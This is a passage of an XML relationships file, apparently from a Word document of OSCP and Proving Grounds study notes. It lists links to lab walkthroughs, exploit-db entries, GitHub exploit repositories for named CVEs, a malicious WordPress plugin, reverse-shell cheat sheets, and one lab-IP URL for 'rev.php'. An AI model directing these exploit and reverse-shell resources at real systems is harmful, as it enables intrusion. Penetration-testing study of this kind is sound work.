Target="https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics" TargetMode="External"/><Relationship Id="rId977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wetw0rk/malicious-wordpress-plugin/tree/master?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@malwarejoe/xposedapi-offsec-proving-grounds-lab-write-up-3848be2c61d3" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://w3bspl01t3r.medium.com/xposedapi-35efbe1fc2c1" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.45.232/rev.php" TargetMode="External"/><Relationship Id="rId972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image551.png"/><Relationship Id="rId1320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@AveragePomelo/proving-ground-practice-walkthrough-apex-linux-0e1e3f227b8e" TargetMode="External"/><Relationship Id="rId970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId1321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://al1z4deh.medium.com/proving-grounds-apex-834e61a9fc03" TargetMode="External"/><Relationship Id="rId1322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49359?source=post_page-----834e61a9fc03---------------------------------------" TargetMode="External"/><Relationship Id="rId1114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId1356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce" TargetMode="External"/><Relationship Id="rId1115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-44-proving-grounds-bullybox-bc2918d6cbd6" TargetMode="External"/><Relationship Id="rId1357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId1116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abyssal_bloom/proving-grounds-bitforge-walkthrough-oscp-9aeb4fed4080" TargetMode="External"/><Relationship Id="rId1358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xdf.gitlab.io/2024/08/24/htb-runner.html?source=post_page-----01737dd96583---------------------------------------#" TargetMode="External"/><Relationship Id="rId1117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image372.png"/><Relationship Id="rId1359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Stuub/RCity-CVE-2024-27198" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meyerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId1118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meyerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId1119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybernews.com/best-password-managers/most-common-passwords/" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image331.png"/><Relationship Id="rId767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image512.png"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@tacitPanda/sams-ctf-writeup-offsec-proving-grounds-ffacc098282b" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image445.png"/><Relationship Id="rId768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-08-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-bee721403cd4" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-walla-walkthrough-2e0c33eb284b" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image391.png"/><Relationship Id="rId1350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-61-proving-grounds-lavita-05d148d4fbfc" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image269.png"/><Relationship Id="rId1351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joshuavanderpoll/CVE-2021-3129/tree/main" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sunsetmidnight-84-100-bc230e87baa2" TargetMode="External"/><Relationship Id="rId763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId1110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId1352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@MEGAZORDI/oscp-practice-proving-grounds-fired-99745bfe2977" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image362.png"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mysqltutorial.org/mysql-cheat-sheet/" TargetMode="External"/><Relationship Id="rId762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId1111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image440.png"/><Relationship Id="rId1353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/fired-proving-grounds-aad10f26d180" TargetMode="External"/><Relationship Id="rId761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image528.png"/><Relationship Id="rId1112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/sshpass" TargetMode="External"/><Relationship Id="rId1354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT%5C" TargetMode="External"/><Relationship Id="rId760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image400.png"/><Relationship Id="rId1113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/sshpass" TargetMode="External"/><Relationship Id="rId1355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/miko550/CVE-2023-32315?source=post_page-----aad10f26d180---------------------------------------" TargetMode="External"/><Relationship Id="rId1103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId1345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-08-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-bee721403cd4" TargetMode="External"/><Relationship Id="rId1104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Terminal_pager" TargetMode="External"/><Relationship Id="rId1346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jbaines-r7/through_the_wire/blob/main/through_the_wire.py" TargetMode="External"/><Relationship Id="rId1105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Terminal_pager" TargetMode="External"/><Relationship Id="rId1347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/flu-proving-grounds-5325abd4a4f2" TargetMode="External"/><Relationship Id="rId1106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image532.png"/><Relationship Id="rId1348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-23-proving-grounds-levram-d033737f0025" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.png"/><Relationship Id="rId1107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image423.png"/><Relationship Id="rId1349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50640" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-billyboss-walkthrough-3f8da159dc2c" TargetMode="External"/><Relationship Id="rId1108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image425.png"/><Relationship Id="rId1109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1i-8STeFDV0TqB1cQvrZ_UWFewP6AtlAKiVLQ3THFuqA/edit?tab=t.0#heading=h.m0qjundbomkr" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image556.png"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.png"/><Relationship Id="rId756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@optimusprime7/sar-walkthrough-offsec-proving-grounds-play-61c4bb97adb6" TargetMode="External"/><Relationship Id="rId998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/impacket-scripts/" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/impacket-scripts/" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.png"/><Relationship Id="rId995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://revshells.com" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@sakyb7/proving-grounds-hokkaido-tjnull-oscp-prep-ca34df1e6491" TargetMode="External"/><Relationship Id="rId758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image427.png"/><Relationship Id="rId757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image227.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tib3rius/AutoRecon" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yaldobaoth/OSCP-Scripts#" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image260.png"/><Relationship Id="rId1340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://al1z4deh.medium.com/proving-grounds-fanatastic-b14a6e535e1f" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://172.16.xxx" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" TargetMode="External"/><Relationship Id="rId752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/backup-backup/" TargetMode="External"/><Relationship Id="rId1341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-fanatastic-792d7014d7a0" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dionach/CMSmap" TargetMode="External"/><Relationship Id="rId751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/python/#capabilities" TargetMode="External"/><Relationship Id="rId993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/backup-backup/" TargetMode="External"/><Relationship Id="rId1100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bdsalazar/proving-grounds-hunit-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-36081fc196d" TargetMode="External"/><Relationship Id="rId1342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/quackerjack" TargetMode="External"/><Relationship Id="rId750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image238.png"/><Relationship Id="rId992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image216.png"/><Relationship Id="rId1101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image385.png"/><Relationship Id="rId1343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-quackerjack-798eec0b7281" TargetMode="External"/><Relationship Id="rId991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId1102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId1344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-quackerjack-373b0e4255e5" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image553.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image424.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vaibhavc418/offensive-security-insanity-hosting-walkthrough-f036b27fcca9" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/unode/firefox_decrypt" TargetMode="External"/><Relationship Id="rId709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96" TargetMode="External"/><Relationship Id="rId707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-64-proving-grounds-30964bed6cf3" TargetMode="External"/><Relationship Id="rId949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-dc-1-44cccfbeaa71" TargetMode="External"/><Relationship Id="rId948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dante-cyber.medium.com/hack-the-box-bike-sp-251a8b5e70f2" TargetMode="External"/><Relationship Id="rId700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image475.png"/><Relationship Id="rId942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ishsome.medium.com/proving-ground-djinn3-walk-through-96c92bda7942" TargetMode="External"/><Relationship Id="rId941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vgqxjb/ssti1-picoctf-0853498698d5" TargetMode="External"/><Relationship Id="rId940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vgqxjb/ssti1-picoctf-0853498698d5" TargetMode="External"/><Relationship Id="rId705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/quackerjack" TargetMode="External"/><Relationship Id="rId947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.png"/><Relationship Id="rId704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bdsalazar/proving-grounds-nibbles-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-918727ec6b25" TargetMode="External"/><Relationship Id="rId946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image293.png"/><Relationship Id="rId703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://libcalc.so" TargetMode="External"/><Relationship Id="rId945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Infrastructure/common-http-ports.txt" TargetMode="External"/><Relationship Id="rId702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image487.png"/><Relationship Id="rId944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ishsome.medium.com/proving-ground-djinn3-walk-through-96c92bda7942" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-02-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-78a5497ce589" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image367.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-62-proving-grounds-zipper-b49a52ed8e38" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-ctf-200-02-6b114263cd04" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/BababaBlue/71d85a7182993f6b4728c5d6a77e669f" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-squid-1bc1e2dbb8d4" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image221.png"/><Relationship Id="rId939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212.png"/><Relationship Id="rId938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/server-side-template-injection" TargetMode="External"/><Relationship Id="rId937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#identify" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/roughiz/lfito_rce" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/roughiz/lfito_rce" TargetMode="External"/><Relationship Id="rId932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Secure_and_HttpOnly_cookies" TargetMode="External"/><Relationship Id="rId931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Secure_cookie" TargetMode="External"/><Relationship Id="rId930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Secure_cookie" TargetMode="External"/><Relationship Id="rId936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe" TargetMode="External"/><Relationship Id="rId935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity" TargetMode="External"/><Relationship Id="rId934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image280.png"/><Relationship Id="rId933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Secure_and_HttpOnly_cookies" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image448.png"/><Relationship Id="rId1312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-zenphoto-proving-ground-practice-fe099ba949bc" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId1313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-zenphoto-proving-ground-practice-fe099ba949bc" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image549.png"/><Relationship Id="rId1314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-extplorer-proving-ground-practice-a9efaa755f6d" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image357.png"/><Relationship Id="rId1315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-extplorer-proving-ground-practice-a9efaa755f6d" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId1316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/extplorer-proving-grounds-practice-walkthrough-73c076002709" TargetMode="External"/><Relationship Id="rId65" 